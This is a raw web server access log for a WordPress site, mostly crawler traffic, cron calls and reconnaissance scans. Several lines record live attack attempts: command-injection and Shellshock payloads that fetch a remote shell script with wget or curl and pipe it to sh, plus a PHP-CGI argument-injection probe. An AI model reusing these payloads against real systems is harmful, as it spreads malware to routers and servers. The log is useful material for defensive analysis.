File: /home/logs/cqqizhou_access_2025-12-04.log
36.133.115.36 - - [04/Dec/2025:00:02:13 +0800] "POST /wp-cron.php?doing_wp_cron=1764777733.1212339401245117187500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
110.249.201.174 - - [04/Dec/2025:00:02:13 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
36.133.115.36 - - [04/Dec/2025:00:13:36 +0800] "POST /wp-cron.php?doing_wp_cron=1764778416.7224829196929931640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
49.51.180.2 - - [04/Dec/2025:00:13:36 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
49.51.180.2 - - [04/Dec/2025:00:13:38 +0800] "GET / HTTP/1.1" 200 33526 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [04/Dec/2025:00:19:05 +0800] "POST /wp-cron.php?doing_wp_cron=1764778745.1588249206542968750000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
66.249.68.64 - - [04/Dec/2025:00:19:05 +0800] "GET /2159/ HTTP/1.1" 200 24794 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.133.115.36 - - [04/Dec/2025:00:23:33 +0800] "POST /wp-cron.php?doing_wp_cron=1764779013.1275129318237304687500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
193.142.147.209 - - [04/Dec/2025:00:23:33 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
193.142.147.209 - - [04/Dec/2025:00:23:34 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 31381 "http://36.133.115.36:80/cgi-bin/luci/;stok=/locale" "-"
36.133.115.36 - - [04/Dec/2025:00:33:01 +0800] "POST /wp-cron.php?doing_wp_cron=1764779581.8927249908447265625000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
95.214.52.170 - - [04/Dec/2025:00:33:02 +0800] "GET / HTTP/1.1" 200 33527 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0"
36.133.115.36 - - [04/Dec/2025:00:43:45 +0800] "POST /wp-cron.php?doing_wp_cron=1764780225.4502038955688476562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
141.98.11.170 - - [04/Dec/2025:00:43:45 +0800] "GET / HTTP/1.1" 200 33527 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Dec/2025:00:57:07 +0800] "POST /wp-cron.php?doing_wp_cron=1764781027.0183560848236083984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
66.249.68.71 - - [04/Dec/2025:00:57:07 +0800] "GET /logistics/ HTTP/1.1" 200 18302 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.133.115.36 - - [04/Dec/2025:00:58:17 +0800] "POST /wp-cron.php?doing_wp_cron=1764781097.0010418891906738281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
45.156.128.49 - - [04/Dec/2025:00:58:17 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.128 - - [04/Dec/2025:00:58:19 +0800] "GET / HTTP/1.1" 200 33988 "http://36.133.115.36/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
36.133.115.36 - - [04/Dec/2025:01:03:09 +0800] "POST /wp-cron.php?doing_wp_cron=1764781389.7806119918823242187500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
193.142.147.209 - - [04/Dec/2025:01:03:10 +0800] "GET / HTTP/1.1" 200 152189 "-" "-"
36.133.115.36 - - [04/Dec/2025:01:09:48 +0800] "POST /wp-cron.php?doing_wp_cron=1764781788.8133230209350585937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.212 - - [04/Dec/2025:01:09:49 +0800] "GET / HTTP/1.1" 200 33527 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Dec/2025:01:12:07 +0800] "POST /wp-cron.php?doing_wp_cron=1764781927.0057768821716308593750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
66.249.79.226 - - [04/Dec/2025:01:12:07 +0800] "GET /robots.txt HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.64 - - [04/Dec/2025:01:12:08 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.228 - - [04/Dec/2025:01:12:09 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.70 - - [04/Dec/2025:01:12:10 +0800] "GET / HTTP/1.1" 200 33527 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.133.115.36 - - [04/Dec/2025:01:27:07 +0800] "POST /wp-cron.php?doing_wp_cron=1764782827.0825400352478027343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
66.249.68.71 - - [04/Dec/2025:01:27:07 +0800] "GET /2214/ HTTP/1.1" 200 21288 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.133.115.36 - - [04/Dec/2025:01:39:17 +0800] "POST /wp-cron.php?doing_wp_cron=1764783557.7767260074615478515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
95.214.52.170 - - [04/Dec/2025:01:39:17 +0800] "GET /dispatch.asp HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
66.249.68.71 - - [04/Dec/2025:01:42:06 +0800] "GET /material.html HTTP/1.1" 200 6459 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.133.115.36 - - [04/Dec/2025:01:46:31 +0800] "POST /wp-cron.php?doing_wp_cron=1764783991.2277960777282714843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
115.159.33.43 - - [04/Dec/2025:01:46:31 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36"
141.98.11.170 - - [04/Dec/2025:01:46:44 +0800] "GET / HTTP/1.1" 200 33527 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Dec/2025:01:54:05 +0800] "POST /wp-cron.php?doing_wp_cron=1764784445.6607329845428466796875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.212 - - [04/Dec/2025:01:54:05 +0800] "GET / HTTP/1.1" 200 33527 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Dec/2025:01:56:49 +0800] "POST /wp-cron.php?doing_wp_cron=1764784609.2367479801177978515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
34.74.98.251 - - [04/Dec/2025:01:56:49 +0800] "HEAD /wp/ HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Linux; U; Android 10; en-US; CPH2015) AppleWebKit/537.36 (KHTML, like Gecko) UCBrowser/13.5.8.1311 Mobile Safari/537.36"
34.74.98.251 - - [04/Dec/2025:01:56:49 +0800] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6540.18 Safari/537.36"
34.74.98.251 - - [04/Dec/2025:01:56:50 +0800] "HEAD /backup/ HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Linux; Android 14; RMX3842) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.44 Mobile Safari/537.36"
34.74.98.251 - - [04/Dec/2025:01:56:51 +0800] "HEAD /new/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Linux; Android 14; OnePlus 12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.102 Mobile Safari/537.36"
34.74.98.251 - - [04/Dec/2025:01:56:52 +0800] "HEAD /news/ HTTP/1.1" 200 0 "http://cqqizhou.com/new/" "Mozilla/5.0 (Linux; Android 14; OnePlus 12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.102 Mobile Safari/537.36"
34.74.98.251 - - [04/Dec/2025:01:56:53 +0800] "HEAD /old/ HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Linux; Android 13; Infinix X688B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.48 Mobile Safari/537.36"
34.74.98.251 - - [04/Dec/2025:01:56:54 +0800] "HEAD /wordpress/ HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36"
34.74.98.251 - - [04/Dec/2025:01:56:55 +0800] "HEAD /blog/ HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Linux; Android 11; RMX2195) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.210 Mobile Safari/537.36 OPR/75.2.3995.72468"
66.249.68.64 - - [04/Dec/2025:01:57:07 +0800] "GET /services/ HTTP/1.1" 200 19831 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.133.115.36 - - [04/Dec/2025:02:02:15 +0800] "POST /wp-cron.php?doing_wp_cron=1764784935.1722528934478759765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
51.68.236.92 - - [04/Dec/2025:02:02:15 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.4; http://mj12bot.com/)"
51.68.236.92 - - [04/Dec/2025:02:02:15 +0800] "GET / HTTP/1.1" 200 33988 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.4; http://mj12bot.com/)"
36.133.115.36 - - [04/Dec/2025:02:24:36 +0800] "POST /wp-cron.php?doing_wp_cron=1764786276.0407381057739257812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
193.142.146.230 - adsl [04/Dec/2025:02:24:36 +0800] "GET / HTTP/1.1" 200 33527 "-" "Go-http-client/1.1"
192.159.99.95 - - [04/Dec/2025:02:34:04 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%60busybox%20wget%20-qO-%20http%3A%2F%2F70.184.13.47%2Frondo.zqq.sh%7Csh%60 HTTP/1.1" 499 0 "-" "Mozilla/5.0 (rondo2012@atomicmail.io)"
36.133.115.36 - - [04/Dec/2025:02:34:05 +0800] "POST /wp-cron.php?doing_wp_cron=1764786845.0279119014739990234375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
192.159.99.95 - - [04/Dec/2025:02:34:06 +0800] "POST /cgi-bin/login.cgi HTTP/1.0" 499 0 "-" "Mozilla/5.0 (rondo2012@atomicmail.io)"
192.159.99.95 - - [04/Dec/2025:02:34:06 +0800] "POST /apply_sec.cgi HTTP/1.1" 499 0 "http://36.133.115.36/login_pic.asp" "Mozilla/5.0 (rondo2012@atomicmail.io)"
192.159.99.95 - admin [04/Dec/2025:02:34:07 +0800] "POST /apply.cgi HTTP/1.1" 499 0 "http://36.133.115.36/system.html" "Mozilla/5.0 (rondo2012@atomicmail.io)"
192.159.99.95 - - [04/Dec/2025:02:34:08 +0800] "GET / HTTP/1.1" 499 0 "-" "() { :; }; /bin/bash -c \x22(wget -qO- http://70.184.13.47/rondo.qre.sh||busybox wget -qO- http://70.184.13.47/rondo.qre.sh||curl -s http://70.184.13.47/rondo.qre.sh)|sh\x22& # rondo2012@atomicmail.io"
192.159.99.95 - admin [04/Dec/2025:02:34:10 +0800] "POST /cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4= HTTP/1.1" 499 0 "http://36.133.115.36/cgi-bin/server/server.cgi?func=server02_main_submit&counter=6.7496022225883&TEST_BTN4=" "Mozilla/5.0 (rondo2012@atomicmail.io)"
192.159.99.95 - admin [04/Dec/2025:02:34:10 +0800] "POST /goform/mp HTTP/1.1" 499 0 "-" "Mozilla/5.0 (rondo2012@atomicmail.io)"
192.159.99.95 - - [04/Dec/2025:02:34:11 +0800] "POST /goform/Mail_Test HTTP/1.0" 499 0 "-" "Mozilla/5.0 (rondo2012@atomicmail.io)"
192.159.99.95 - - [04/Dec/2025:02:34:12 +0800] "GET /HNAP1/ HTTP/1.1" 499 0 "-" "Mozilla/5.0 (rondo2012@atomicmail.io)"
192.159.99.95 - - [04/Dec/2025:02:34:12 +0800] "GET /setup.cgi?todo=funjsq_login&funjsq_access_token=12345|busybox%20wget%20-qO-%20http%3A%2F%2F70.184.13.47%2Frondo.fep.sh%7Csh%0A&test=11%00currentsetting.htm HTTP/1.1" 499 0 "-" "Mozilla/5.0 (rondo2012@atomicmail.io)"
192.159.99.95 - - [04/Dec/2025:02:34:13 +0800] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 499 0 "-" "() { :; }; /bin/bash -c \x22(wget -qO- http://70.184.13.47/rondo.fve.sh||busybox wget -qO- http://70.184.13.47/rondo.fve.sh||curl -s http://70.184.13.47/rondo.fve.sh)|sh\x22& # rondo2012@atomicmail.io"
36.133.115.36 - - [04/Dec/2025:02:36:45 +0800] "POST /wp-cron.php?doing_wp_cron=1764787005.2855060100555419921875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
124.156.172.52 - - [04/Dec/2025:02:36:45 +0800] "GET /logistics HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
124.156.172.52 - - [04/Dec/2025:02:36:45 +0800] "GET /logistics/ HTTP/1.1" 200 83532 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
36.133.115.36 - - [04/Dec/2025:02:38:23 +0800] "POST /wp-cron.php?doing_wp_cron=1764787103.6424469947814941406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
79.124.40.86 - - [04/Dec/2025:02:38:23 +0800] "HEAD / HTTP/1.0" 301 0 "-" "-"
36.133.115.36 - - [04/Dec/2025:02:43:37 +0800] "POST /wp-cron.php?doing_wp_cron=1764787417.3976089954376220703125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
36.133.108.119 - - [04/Dec/2025:02:43:37 +0800] "HEAD /bug/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
36.133.115.36 - - [04/Dec/2025:02:56:16 +0800] "POST /wp-cron.php?doing_wp_cron=1764788176.2208099365234375000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
185.16.39.146 - - [04/Dec/2025:02:56:17 +0800] "GET / HTTP/1.1" 200 152189 "http://36.133.115.36:80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [04/Dec/2025:03:03:19 +0800] "POST /wp-cron.php?doing_wp_cron=1764788599.8685619831085205078125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
193.142.147.209 - - [04/Dec/2025:03:03:19 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
193.142.147.209 - - [04/Dec/2025:03:03:21 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 31381 "http://36.133.115.36:80/cgi-bin/luci/;stok=/locale" "-"
36.133.115.36 - - [04/Dec/2025:03:03:55 +0800] "POST /wp-cron.php?doing_wp_cron=1764788635.2851259708404541015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
141.98.11.170 - - [04/Dec/2025:03:03:55 +0800] "GET / HTTP/1.1" 200 33527 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Dec/2025:03:22:42 +0800] "POST /wp-cron.php?doing_wp_cron=1764789762.4023261070251464843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
43.157.174.69 - - [04/Dec/2025:03:22:42 +0800] "GET / HTTP/1.1" 200 33526 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [04/Dec/2025:03:33:13 +0800] "POST /wp-cron.php?doing_wp_cron=1764790393.5242369174957275390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.212 - - [04/Dec/2025:03:33:13 +0800] "GET / HTTP/1.1" 200 33527 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Dec/2025:03:42:30 +0800] "POST /wp-cron.php?doing_wp_cron=1764790950.1953470706939697265625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
85.208.96.199 - - [04/Dec/2025:03:42:30 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.18 - - [04/Dec/2025:03:42:30 +0800] "GET /services/ HTTP/1.1" 200 25614 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
36.133.115.36 - - [04/Dec/2025:03:50:30 +0800] "POST /wp-cron.php?doing_wp_cron=1764791430.8151860237121582031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
52.167.144.220 - - [04/Dec/2025:03:50:31 +0800] "GET /?s=2025 HTTP/1.1" 200 19472 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [04/Dec/2025:03:59:32 +0800] "POST /wp-cron.php?doing_wp_cron=1764791972.0819768905639648437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
66.249.68.71 - - [04/Dec/2025:03:59:32 +0800] "GET /portfolio/duplex-stainless-steel/ HTTP/1.1" 200 18717 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
43.135.142.37 - - [04/Dec/2025:03:59:36 +0800] "GET / HTTP/1.1" 200 33527 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [04/Dec/2025:04:14:22 +0800] "POST /wp-cron.php?doing_wp_cron=1764792862.8034219741821289062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
49.51.196.42 - - [04/Dec/2025:04:14:23 +0800] "GET / HTTP/1.1" 200 33526 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [04/Dec/2025:04:16:38 +0800] "POST /wp-cron.php?doing_wp_cron=1764792998.4750919342041015625000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
47.97.2.79 - - [04/Dec/2025:04:16:38 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
36.133.115.36 - - [04/Dec/2025:04:16:49 +0800] "POST /wp-cron.php?doing_wp_cron=1764793009.4875710010528564453125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
36.133.115.36 - - [04/Dec/2025:04:16:49 +0800] "POST /wp-cron.php?doing_wp_cron=1764793009.4879209995269775390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
47.97.2.79 - - [04/Dec/2025:04:16:49 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
47.97.2.79 - - [04/Dec/2025:04:16:49 +0800] "GET /nmaplowercheck1764793007 HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
47.97.2.79 - - [04/Dec/2025:04:16:49 +0800] "POST /sdk HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
47.97.2.79 - - [04/Dec/2025:04:16:50 +0800] "GET /HNAP1 HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
47.97.2.79 - - [04/Dec/2025:04:16:50 +0800] "GET /evox/about HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
47.97.2.79 - - [04/Dec/2025:04:17:09 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
47.97.2.79 - - [04/Dec/2025:04:17:10 +0800] "GET / HTTP/1.1" 301 5 "-" "-"
36.133.115.36 - - [04/Dec/2025:04:18:33 +0800] "POST /wp-cron.php?doing_wp_cron=1764793113.6971960067749023437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
52.167.144.150 - - [04/Dec/2025:04:18:33 +0800] "GET /atom.xml HTTP/1.1" 404 8983 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [04/Dec/2025:04:21:08 +0800] "POST /wp-cron.php?doing_wp_cron=1764793268.4295840263366699218750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.212 - - [04/Dec/2025:04:21:08 +0800] "GET / HTTP/1.1" 200 33527 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Dec/2025:04:24:22 +0800] "POST /wp-cron.php?doing_wp_cron=1764793462.8939850330352783203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
141.98.11.170 - - [04/Dec/2025:04:24:23 +0800] "GET / HTTP/1.1" 200 33527 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Dec/2025:04:28:12 +0800] "POST /wp-cron.php?doing_wp_cron=1764793692.4797799587249755859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
121.199.173.138 - - [04/Dec/2025:04:28:12 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
121.199.173.138 - - [04/Dec/2025:04:28:22 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
121.199.173.138 - - [04/Dec/2025:04:28:22 +0800] "GET /nmaplowercheck1764793700 HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
121.199.173.138 - - [04/Dec/2025:04:28:22 +0800] "POST /sdk HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
121.199.173.138 - - [04/Dec/2025:04:28:23 +0800] "GET /HNAP1 HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
121.199.173.138 - - [04/Dec/2025:04:28:23 +0800] "GET /evox/about HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
121.199.173.138 - - [04/Dec/2025:04:28:42 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
121.199.173.138 - - [04/Dec/2025:04:28:43 +0800] "GET / HTTP/1.1" 301 5 "-" "-"
36.133.115.36 - - [04/Dec/2025:04:55:58 +0800] "POST /wp-cron.php?doing_wp_cron=1764795358.9449889659881591796875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
193.142.147.209 - - [04/Dec/2025:04:55:59 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
193.142.147.209 - - [04/Dec/2025:04:56:00 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 31381 "http://36.133.115.36:80/cgi-bin/luci/;stok=/locale" "-"
36.133.115.36 - - [04/Dec/2025:05:10:32 +0800] "POST /wp-cron.php?doing_wp_cron=1764796232.3205869197845458984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.212 - - [04/Dec/2025:05:10:32 +0800] "GET / HTTP/1.1" 200 33527 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Dec/2025:05:13:53 +0800] "POST /wp-cron.php?doing_wp_cron=1764796433.9287090301513671875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
121.43.146.23 - - [04/Dec/2025:05:13:53 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
62.60.131.73 - - [04/Dec/2025:05:23:00 +0800] "GET / HTTP/1.1" 200 33988 "-" "Go-http-client/1.1"
36.133.115.36 - - [04/Dec/2025:05:26:16 +0800] "POST /wp-cron.php?doing_wp_cron=1764797176.8593680858612060546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
102.204.223.186 - - [04/Dec/2025:05:26:16 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 31381 "-" "libredtail-http"
